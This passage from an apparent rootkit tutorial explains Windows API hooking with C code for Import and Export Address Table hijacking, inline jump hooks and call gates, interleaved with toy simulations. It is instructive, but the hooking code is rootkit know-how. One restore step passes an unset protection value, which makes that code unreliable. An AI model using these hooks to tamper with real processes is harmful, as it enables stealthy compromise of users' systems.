   Windows 2000. (error checks stripped)
*/
int HijackApiEx(HMODULE hLocalModule, const char *ntiDllName, const char *ntiApiName, PVOID pApiNew, PVOID *ApiOrg)
{
    /* Pointer to: */
    PIMAGE_DOS_HEADER pDOSHeader; /* DOS header */
    PIMAGE_NT_HEADERS pNTHeaders; /* NT headers */
    PIMAGE_IMPORT_DESCRIPTOR pImportDesc; /* Import Descriptor */
    PIMAGE_THUNK_DATA pIAT; /* Functions address chunk */
    PIMAGE_THUNK_DATA pINT; /* Functions names array */
    PIMAGE_IMPORT_BY_NAME pImportName; /* Function Name */
    PIMAGE_THUNK_DATA pIteratingIAT; /* Iterating pointer */
    char* DllName=NULL;
    DWORD IAT_funcAddr=0; /* Function's entry point in IAT */
    DWORD GPR_funcAddr=0; /* Function entry point with GetProcAddress */
    unsigned int cFuncs=0; /* Function counter */
    DWORD dwProtect=0, dwNewProtect=0; /* Memory protection flags */
    int i=0, ret=0; /* Iteration counter, return value */
    DWORD dwBase; /* Module base address */
    
    /* Get base address */
    dwBase = (DWORD)hLocalModule;
    /* Get DOS header */
    pDOSHeader = (PIMAGE_DOS_HEADER) dwBase;
    /* Get NT headers */
    pNTHeaders = MakePtr(PIMAGE_NT_HEADERS, pDOSHeader,
        pDOSHeader->e_lfanew);
    /* Localize Import table */
    pImportDesc = MakePtr(PIMAGE_IMPORT_DESCRIPTOR, dwBase,
        pNTHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT] .VirtualAddress);
    /* For each imported DLL */
    while(pImportDesc->Name)
    {
          /* Set up DLL name pointer */
          DllName = MakePtr(char*, dwBase, pImportDesc->Name);

          /* check if it’s the wanted dll */
          if(!_stricmp(ntiDllName, DllName))
        {
            /* Set up Import Name/Address Table pointers for this DLL */
                    pINT = MakePtr(PIMAGE_THUNK_DATA, dwBase,
                        pImportDesc->OriginalFirstThunk );
                    pIAT = MakePtr(PIMAGE_THUNK_DATA, dwBase,
                        pImportDesc->FirstThunk );
                        cFuncs = 0;
                        
                        /* Count how many entries there are in this IAT. Array is 0 terminated. (Trick used by Matt Pietrek)
            */
                        
                        pIteratingIAT = pIAT;
                        while ( pIteratingIAT->u1.Function )
                        {
                                 cFuncs++;
                                 pIteratingIAT++;
                        }
    
                        if ( cFuncs != 0 )
                        {
                          /* Scan through the IAT */
                          pIteratingIAT = pIAT;
                          while ( pIteratingIAT->u1.Function )
                          {
                                /* Check that function is imported by name */
                                if ( !IMAGE_SNAP_BY_ORDINAL( pINT->u1.Ordinal ) )
                                {
                                   pImportName = MakePtr (PIMAGE_IMPORT_BY_NAME,
                                          dwBase, pINT->u1.AddressOfData);

                                   /* Check if it’s the target API */
                                   if(!_stricmp(ntiApiName,
                                          ((char*)pImportName->Name)))
                                   {

                                        /* OK, this is the target API, save genuine
                                           API address for later use */
                                        if (ApiOrg)
                                          *ApiOrg = (void*)
                                          (pIteratingIAT->u1.Function);
                                                        
                                        /* Unlock read only memory protection */
                                        VirtualProtect((LPVOID)
                                        (&pIteratingIAT->u1.Function),
                                        sizeof(DWORD),PAGE_EXECUTE_READWRITE,
                                        &dwProtect);
                                        /* OVERWRITE API address! 🙂 */
                                        (DWORD*)pIteratingIAT->u1.Function =
                                        (DWORD*)pApiNew;
                                        /* Restore previous memory protection */
                                        VirtualProtect((LPVOID)
                                        (&pIteratingIAT->u1.Function),
                                        sizeof(DWORD),dwNewProtect,
                                        &dwProtect);
                                        return 1;
                                   } /* end ‘target check’ */
                                } /* end ‘imported by name?’ */
            
                                pIteratingIAT++; /* jump to next IAT entry */
                                pINT++; /* jump to next INT entry */
                           } /* end for each function */
                        } /* end ‘is IAT empty?’*/
           } /* end ‘target dll check’ */

           pImportDesc++; /* jump to next dll */
     } /* end while (for each DLL) */

    return ret;
}

How to use this?
For example, to hook GetProcAddress, just call the function as follows:
int result;
result = HijackApiEx(hLocalModule, "KERNEL32.DLL", "GetProcAddress", (PVOID)&MyGetProcAddress, (PVOID *)&fGetProcAddress);

Here hLocalModule is a handle to the module whose Import Table is going to be altered, MyGetProcAddress is the replacement function, and fGetProcAddress is a FARPROC used to call the real API without falling into the hook.
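The effect of HijackApiEx can be modelled portably with two parallel, NULL-terminated arrays: one holding names (the Import Name Table) and one holding function pointers (the Import Address Table) that callers go through. This is a simulation under stated assumptions, not Windows code: toy_int, toy_iat, toy_hijack, real_api and hooked_api are hypothetical names, and since the toy IAT is an ordinary writable array no VirtualProtect call is needed.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

typedef int (*api_fn)(int);

/* Hypothetical stand-ins for a genuine API and its replacement */
static int real_api(int x) { return x + 1; }

static api_fn saved_real; /* plays the role of fGetProcAddress */
static int hooked_api(int x) { return saved_real(x) * 10; } /* call the real API, then alter the result */

/* Toy import table: INT holds names, IAT holds resolved addresses.
   Both arrays end with a NULL entry, like the real ones. */
static const char *toy_int[] = { "OtherApi", "TargetApi", NULL };
static api_fn toy_iat[] = { real_api, real_api, NULL };

/* Same idea as HijackApiEx: walk INT and IAT in parallel, match by name,
   save the genuine pointer, then overwrite the IAT slot. */
static int toy_hijack(const char *name, api_fn new_fn, api_fn *orig)
{
    assert(name != NULL && new_fn != NULL);
    for (size_t i = 0; toy_iat[i] != NULL; i++) {
        if (strcmp(toy_int[i], name) == 0) {
            if (orig)
                *orig = toy_iat[i];
            toy_iat[i] = new_fn;
            return 1;
        }
    }
    return 0;
}
```

After toy_hijack("TargetApi", hooked_api, &saved_real), a call through toy_iat[1] lands in hooked_api, which can still reach the genuine function through saved_real; the other slot is left untouched.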

Redirecting the Export Address Table:
This method is far less common than the previous one, since it is neither as useful nor as easy to set up. Like IAT hooking, it relies on structures introduced by the PE designers to speed up the loader’s work when resolving DLL exports. References to these exports are gathered in a dedicated section, the Export Table, which associates a name or an ordinal with each exported symbol (function, variable). From this name or ordinal it is then possible to retrieve the address of the symbol inside the memory space of the loaded module.
The export section begins at RVA pNTHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress with an IMAGE_EXPORT_DIRECTORY structure presented below.

typedef struct _IMAGE_EXPORT_DIRECTORY {
    DWORD Characteristics;       /* Flags for the exports. Currently, none are defined. */
    DWORD TimeDateStamp;         /* The time/date that the exports were created. */
    WORD  MajorVersion;          /* The major version number of the exports. */
    WORD  MinorVersion;          /* The minor version number of the exports. */
    DWORD Name;                  /* RVA of an ASCII string with the DLL name associated with these exports (for example, KERNEL32.DLL). */
    DWORD Base;                  /* The starting ordinal value to be used for this executable's exports. */
    DWORD NumberOfFunctions;     /* The number of entries in the EAT. Some entries may be 0, meaning that no code/data is exported with that ordinal value. */
    DWORD NumberOfNames;         /* The number of entries in the Export Names Table (ENT). */
    DWORD AddressOfFunctions;    /* The RVA of the EAT. */
    DWORD AddressOfNames;        /* The RVA of the ENT. */
    DWORD AddressOfNameOrdinals; /* The RVA of the export ordinal table. */
} IMAGE_EXPORT_DIRECTORY, *PIMAGE_EXPORT_DIRECTORY;

The members we’re interested in are:
AddressOfFunctions: an RVA to the Export Address Table (EAT), an array of entry point RVAs. Each nonzero RVA in the array corresponds to an exported symbol.
AddressOfNames: an RVA to the Export Name Table, an array of RVAs to ASCII strings. Each string is the name of a symbol exported by name.
AddressOfNameOrdinals: an RVA to the Export Ordinal Table. This array of WORDs maps each index of the Export Name Table to the corresponding Export Address Table entry.

In practice, how does it work? Let’s say we want to recover the address of MessageBoxA by walking the Export Table of user32.dll. We start by scanning through AddressOfNames and find the function name at index X.
Then we read AddressOfNameOrdinals[X] and find the value Y. Finally, we read AddressOfFunctions[Y], which is the RVA of MessageBoxA’s entry point.
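The three-step walk (name at index X, ordinal Y, entry point RVA) can be sketched portably with the three tables already converted into C arrays. The struct toy_exports, the function toy_lookup and the sample RVAs used with it are hypothetical; a real implementation reads these arrays from the mapped module through RVAs, as EAT_GetPointerToApiAddress does.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Toy export directory: AddressOfNames, AddressOfNameOrdinals and
   AddressOfFunctions, already turned from RVAs into C arrays. */
struct toy_exports {
    uint32_t number_of_names;
    const char **names;        /* Export Name Table */
    const uint16_t *name_ords; /* Export Ordinal Table: index into functions[] */
    const uint32_t *functions; /* Export Address Table: entry point RVAs */
};

/* Name -> index X -> AddressOfNameOrdinals[X] = Y -> AddressOfFunctions[Y].
   Returns the entry point RVA, or 0 when the name is not exported. */
static uint32_t toy_lookup(const struct toy_exports *e, const char *name)
{
    assert(e != NULL && name != NULL);
    for (uint32_t x = 0; x < e->number_of_names; x++) {
        if (strcmp(e->names[x], name) == 0) {
            uint16_t y = e->name_ords[x];
            return e->functions[y];
        }
    }
    return 0;
}
```

Note that Y is a plain index into the EAT; the ordinal a client would pass to GetProcAddress is Y + Base.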

In the case of hijacking, the main idea is to scan through the Export Table and overwrite the address of the function we want to replace, so that subsequent address resolutions for this symbol point to our code instead of the real one. This works perfectly against programs that resolve addresses at run time by calling GetProcAddress: this function does the same job as the loader by walking the Export Table, so foiling it is easy. In the case of the loader, however, address resolution happens before we get a chance to run code inside a newly created process, so faking the Export Table of a given module won’t affect the Import Table of that process. This is why Export Address Table hooking is not very effective under Windows NT/2000/XP.
Windows 9x, however, does not map a copy of system DLLs into the memory space of each process as NT does, but rather loads them into an area shared by every process (something like PAGE_EXECUTE_READ, but write access can be forced). In this case, hooking the Export Table is very effective since it affects every newly created process.
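The difference between an import bound before the patch and a lookup performed after it can be modelled in a few lines. In this sketch the base address, the EAT contents and the names toy_resolve and toy_eat_hijack are all hypothetical: toy_resolve plays GetProcAddress (it walks the EAT at call time) and toy_eat_hijack mirrors EAT_Hijack by storing the replacement as an RVA relative to the module base.

```c
#include <assert.h>
#include <stdint.h>

/* Toy module: a base address and an EAT of entry point RVAs (values hypothetical) */
#define TOY_BASE 0x77D40000u
static uint32_t toy_eat[] = { 0x0001F000u, 0x00020000u };

/* GetProcAddress-like resolution: reads the EAT each time it is called */
static uint32_t toy_resolve(unsigned index)
{
    assert(index < sizeof toy_eat / sizeof toy_eat[0]);
    return TOY_BASE + toy_eat[index];
}

/* EAT_Hijack-like patch: store the replacement as an RVA from the base.
   In this model, unsigned 32-bit arithmetic wraps, so new_addr may lie
   below TOY_BASE. Returns the previous absolute address. */
static uint32_t toy_eat_hijack(unsigned index, uint32_t new_addr)
{
    uint32_t old = toy_resolve(index);
    toy_eat[index] = new_addr - TOY_BASE;
    return old;
}
```

An address copied out before the patch (as the NT loader does when it fills an Import Table at process start-up) keeps pointing to the genuine function, while every later toy_resolve call returns the replacement.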

Now that the theory is covered, it’s time to see the code.

/*
This function returns the address of the Export Address Table member
(AddressOfFunctions[x]) that holds the real API address. In other words, at the
address returned you will find the RVA of the API's entry point in memory.
(Equivalent to GetProcAddress, except that you have to compute the API address
yourself, which is exactly what EAT hooking needs.)

Sample:
HMODULE hDll = LoadLibraryA("user32.dll");
DWORD BaseAddr = (DWORD)hDll;
DWORD *p = EAT_GetPointerToApiAddress(hDll, "MessageBoxA");

printf("%s real address: 0x%lx (RVA+BaseAddr), stored in EAT at %p\n",
       "MessageBoxA", (unsigned long)(*p + BaseAddr), (void *)p);

Note that the location returned holds an RVA, not a complete address:
you have to add the module base address.
(error checks stripped)
*/

/* Returns an address built from a base address and an RVA, cast to Type */
#define RVA2OFS(Type, BaseAddr, RVA) ((Type)((DWORD)(BaseAddr) + (DWORD)(RVA)))

DWORD *EAT_GetPointerToApiAddress(HMODULE hMod, const char *ApiName)
{
    /* Pointer to DOS header */
    PIMAGE_DOS_HEADER pDOSHeader = (PIMAGE_DOS_HEADER)hMod;
    PIMAGE_NT_HEADERS pNTHeader;        /* Pointer to NT headers */
    PIMAGE_EXPORT_DIRECTORY pExportDir; /* Pointer to export section */
    DWORD i, baseAddr;                  /* Counter and module base address */
    DWORD *ENT;                         /* Export Name Table entry */
    DWORD *AOF;                         /* Address Of Functions entry */
    WORD *AONO;                         /* Address Of Name Ordinals entry */

    /* Set up base address */
    baseAddr = (DWORD)hMod;

    /* Build NT headers pointer */
    pNTHeader = RVA2OFS(PIMAGE_NT_HEADERS, pDOSHeader, pDOSHeader->e_lfanew);

    /* Build export section pointer */
    pExportDir = RVA2OFS(PIMAGE_EXPORT_DIRECTORY, hMod,
        pNTHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);

    /* Scan through the ENT, which has NumberOfNames entries */
    for (i = 0; i < pExportDir->NumberOfNames; i++)
    {
        /* Compute ExportNameTable[i]'s address */
        ENT = RVA2OFS(DWORD *, baseAddr, pExportDir->AddressOfNames + sizeof(DWORD) * i);

        /* Perform function name check */
        if (strcmp((char *)(baseAddr + *ENT), ApiName) == 0)
        {
            /* Build pointers:
               AONO: to AddressOfNameOrdinals[i]
               AOF : to AddressOfFunctions[*AONO] */
            AONO = RVA2OFS(WORD *, baseAddr, pExportDir->AddressOfNameOrdinals + sizeof(WORD) * i);
            AOF = RVA2OFS(DWORD *, baseAddr, pExportDir->AddressOfFunctions + sizeof(DWORD) * *AONO);

            /* Return API RVA storage location */
            return AOF;
        }
    }

    /* Not found, return failure */
    return NULL;
}

The function above is the core of the following EAT hijack engine.

/*
This function calls EAT_GetPointerToApiAddress to get the storage location of
the API address, then patches it to hijack future lookups of the real address
by the loader, GetProcAddress, or similar methods.
*/
int EAT_Hijack(HMODULE hDll, const char *ApiName, void **OldApiAddr, void *newApiAddr)
{
    DWORD *p, dwOldProtect, dwTmpProtect;

    /* Get the API address storage location */
    p = EAT_GetPointerToApiAddress(hDll, ApiName);
    if (p == NULL)
        return 0;

    /* Save old API address */
    *OldApiAddr = (void *)(*p + (DWORD)hDll);

    /* Patch function address in EAT */
    VirtualProtect(p, sizeof(DWORD), PAGE_READWRITE, &dwOldProtect);
    *p = (DWORD)newApiAddr - (DWORD)hDll; /* Set new RVA value */
    VirtualProtect(p, sizeof(DWORD), dwOldProtect, &dwTmpProtect);

    return 1;
}

Since using the engine is not obvious, here is a small example that replaces MessageBoxA.

This is our replacement function for MessageBoxA:
#include <windows.h>

/* Pointer to MessageBoxA function */
typedef int (WINAPI *pMessageBoxA)(HWND, LPCSTR, LPCSTR, UINT);
pMessageBoxA fMessageBoxA;    /* Pointer used to test hijacking */
pMessageBoxA oldfMessageBoxA; /* Pointer that will store the genuine address of the API */

/* MessageBoxA replacement: forwards to the genuine API with a forged title */
int WINAPI MyMessageBoxA(HWND hWnd, LPCSTR lpText, LPCSTR lpCaption, UINT uType)
{
    (void)lpCaption; /* the original caption is discarded */
    return oldfMessageBoxA(hWnd, lpText, "Title HIJACKED", uType);
}

Demonstration program:
int main(int argc, char *argv[])
{
    HMODULE hDll; /* user32 module handle */
    hDll = LoadLibraryA("user32.dll"); /* Get user32 base address (loads it if needed) */

    /* BEFORE EAT hijack */
    fMessageBoxA = (pMessageBoxA)GetProcAddress(hDll, "MessageBoxA");
    fMessageBoxA(NULL, "MessageBoxA before hijack", "MessageBoxA not hijacked", MB_OK);

    /* Patch EAT now... */
    EAT_Hijack(hDll, "MessageBoxA", (void **)&oldfMessageBoxA, (void *)&MyMessageBoxA);

    /* AFTER EAT hijack */
    /* Resolve the API again: GetProcAddress walks the patched EAT and returns MyMessageBoxA */
    fMessageBoxA = (pMessageBoxA)GetProcAddress(hDll, "MessageBoxA");
    fMessageBoxA(NULL, "MessageBoxA AFTER hijack", "Title overwritten :p", MB_OK);

    oldfMessageBoxA(NULL, "MessageBoxA using saved address", "MessageBoxA (SAVED ADDRESS)", MB_OK);
    return 0;
}

Inserting an unconditional jump (jmp) – Overview:
This technique involves modifying the machine code of a given API so that it executes an unconditional jump to a replacement function. Thus any direct or indirect call to the hooked API is inevitably redirected to the new function. This is the type of function redirection used by the Microsoft Detours library. In theory, redirection by inserting an unconditional jump is simple: you locate the entry point of the API to be hijacked and insert an unconditional jump to the new function. On its own, however, this technique makes us lose the ability to call the original API, since its first bytes have been overwritten.
There is a solution for calling the original API, though. It involves creating a buffer containing a copy of the API’s memory zone before it is modified, followed by a jump to the address located 5 bytes after the start of that zone. This jump lets the original function continue executing just after the unconditional jump that performs the redirection to the replacement function.
One detail that I deliberately left out until now is the problem of disassembling instructions. In machine code, instructions have variable lengths. How can we write a five-byte unconditional jump while being sure not to damage the target code (‘cutting an instruction in half’)? The answer is simple: in most cases we just use a basic disassembly engine. It lets us collect as many complete instructions as required to reach at least five bytes, i.e. an area just big enough to insert the unconditional jump. Concretely, in memory, all the operations result in:

                        Hijacking
  Before             After              Call Gate
  API_target()       API_target()       API_CallGate()

  push ebp           jmp @New_API       push ebp
  mov ebp, esp                          mov ebp, esp
  push ebx                              push ebx
  push esi                              push esi
  push edi           push edi           jmp @API_target+5
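The instruction-collecting step can be illustrated with a deliberately tiny length decoder that recognises only a handful of common 32-bit prologue opcodes. Both toy_insn_len and collect_space are hypothetical names, and the decoder is an assumption for illustration only: a real engine, such as the Z0MbiE one the rootkit relies on, decodes the full x86 instruction set.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define JMP_SIZE 5 /* E9 + rel32 */

/* Toy length decoder: knows only a few 32-bit prologue instructions.
   Returns 0 for anything it does not recognise. */
static size_t toy_insn_len(const uint8_t *p)
{
    switch (p[0]) {
    case 0x55: case 0x53: case 0x56: case 0x57: case 0x90:
        return 1;                           /* push ebp/ebx/esi/edi, nop */
    case 0x8B: return p[1] == 0xEC ? 2 : 0; /* mov ebp, esp */
    case 0x6A: return 2;                    /* push imm8 */
    case 0x83: return p[1] == 0xEC ? 3 : 0; /* sub esp, imm8 */
    case 0x68: return 5;                    /* push imm32 */
    case 0x81: return p[1] == 0xEC ? 6 : 0; /* sub esp, imm32 */
    default:   return 0;
    }
}

/* Add up whole instructions until at least JMP_SIZE bytes are covered.
   Returns the collected size, or 0 if an unknown opcode is met. */
static size_t collect_space(const uint8_t *code)
{
    size_t collected = 0;
    assert(code != NULL);
    while (collected < JMP_SIZE) {
        size_t len = toy_insn_len(code + collected);
        if (len == 0)
            return 0;
        collected += len;
    }
    return collected;
}
```

With the prologue from the table (55 8B EC 53 56 57) exactly five bytes are collected, matching the four instructions moved into the call gate. With 55 8B EC 83 EC 10, six bytes are collected, because stopping at five would cut the three-byte sub esp, imm8 in half.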

We can see that the role of the redirection engine is to modify the smallest possible zone of the targeted API, so as to insert a jump without causing any damage while keeping the ability to call the API. This is done by saving the code, before it is modified, to a call buffer, or call gate. As explained above, the call gate resumes execution just after the unconditional jump inserted in the original API. At that point, all that remains is to declare a FARPROC pointing to that buffer and to call it as if its address had been resolved by GetProcAddress. The redirection engine used in the rootkit is the one created by Z0MbiE (see Zombie2).

…and getting deeper:
As explained above, the role of this hijack engine is to insert an unconditional jump at a given address to a replacement function, while leaving the possibility of calling the API as it was originally behaving.
This is achieved via the ForgeHook(DWORD pAddr, DWORD pAddrToJump, byte **Buffer) function. It takes three parameters.
 – the address where the hook should be inserted (the API entry point)
 – the memory address that the jump will point to (the replacement API)
 – the address of a pointer used to save the address of the call gate, i.e. the path to the unhooked API.

Let’s start by analysing how the code works:

 * Find where to insert the jump:
CollectedSpace = 0
WHILE CollectedSpace < JUMP SIZE:
 – RETRIEVE THE SIZE OF THE INSTRUCTION AT ADDRESS pAddr + CollectedSpace
 – ADD THIS SIZE TO CollectedSpace (i.e. move on to the next instruction)

 * Create the call gate
 – ALLOCATE MEMORY FOR THE CALL GATE: SIZE OF THE COLLECTED AREA + SIZE OF A JUMP
 – COPY THE INSTRUCTIONS FROM THE COLLECTED AREA TO THE CALL GATE
 – ADD TO THE CALL GATE A JUMP TO pAddr + CollectedSpace (thereby skipping over the hijacked area)

 * Insert the hook in the API code:
 – CLEAR THE COLLECTED AREA WITH NOPs
 – INSERT A JUMP TO pAddrToJump (hook)
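The call gate and hook steps above can be simulated on plain byte buffers, with the addresses the code would occupy passed separately as 32-bit values. This is a sketch under stated assumptions, not ForgeHook itself: toy_forge_hook and put_jmp are hypothetical names, the collected size is supplied by the caller (for instance from a length engine), and nothing here allocates executable memory or changes page protections.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define JMP_SIZE 5

/* Write "jmp to" (E9 rel32) into buf, assuming buf will live at address from */
static void put_jmp(uint8_t *buf, uint32_t from, uint32_t to)
{
    uint32_t rel = to - from - (uint32_t)JMP_SIZE; /* relative to the next instruction */
    buf[0] = 0xE9;
    for (int i = 0; i < 4; i++)                    /* little-endian rel32 */
        buf[1 + i] = (uint8_t)(rel >> (8 * i));
}

/* Simulated ForgeHook: api/api_addr = target code and its address,
   gate/gate_addr = call gate buffer and its address,
   collected = size of the whole instructions to move (>= JMP_SIZE). */
static void toy_forge_hook(uint8_t *api, uint32_t api_addr, size_t collected,
                           uint32_t hook_addr, uint8_t *gate, uint32_t gate_addr)
{
    assert(collected >= JMP_SIZE);
    /* Call gate: copy the collected instructions, then jump back past them */
    memcpy(gate, api, collected);
    put_jmp(gate + collected, gate_addr + (uint32_t)collected,
            api_addr + (uint32_t)collected);
    /* Hook: clear the collected area with NOPs, then jump to the replacement */
    memset(api, 0x90, collected);
    put_jmp(api, api_addr, hook_addr);
}
```

Copying instructions verbatim is only safe when they are position-independent, as in the push/mov prologue above; a relative call or jump inside the collected area would land elsewhere once moved into the call gate, so a real engine has to fix its displacement or refuse to hook.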

The delicate point that remains is how to create a jump directly in machine code. This is done by the GenJmp(DWORD To, DWORD From) function, which performs the operation in two steps by inserting:
 – the opcode for an unconditional relative jump: 0xE9
 – the relative address to jump to, computed with a simple formula: To - From - 5 (on 4 bytes)

For example, you would set a jump at address 0x98765 to the address 0x12
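The 5 subtracted in GenJmp’s formula comes from the CPU adding the rel32 displacement to the address of the instruction that follows the jump, i.e. From + 5. A worked instance with hypothetical addresses (not taken from the article):

```latex
\[
\mathit{rel32} = \mathit{To} - (\mathit{From} + 5) = \mathit{To} - \mathit{From} - 5 \pmod{2^{32}}
\]
\[
\mathit{From} = \texttt{0x00401000},\quad \mathit{To} = \texttt{0x10001000}:\qquad
\mathit{rel32} = \texttt{0x0FC00000} - 5 = \texttt{0x0FBFFFFB}
\]
```

Stored little-endian after the opcode, the five bytes written at From are E9 FB FF BF 0F.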
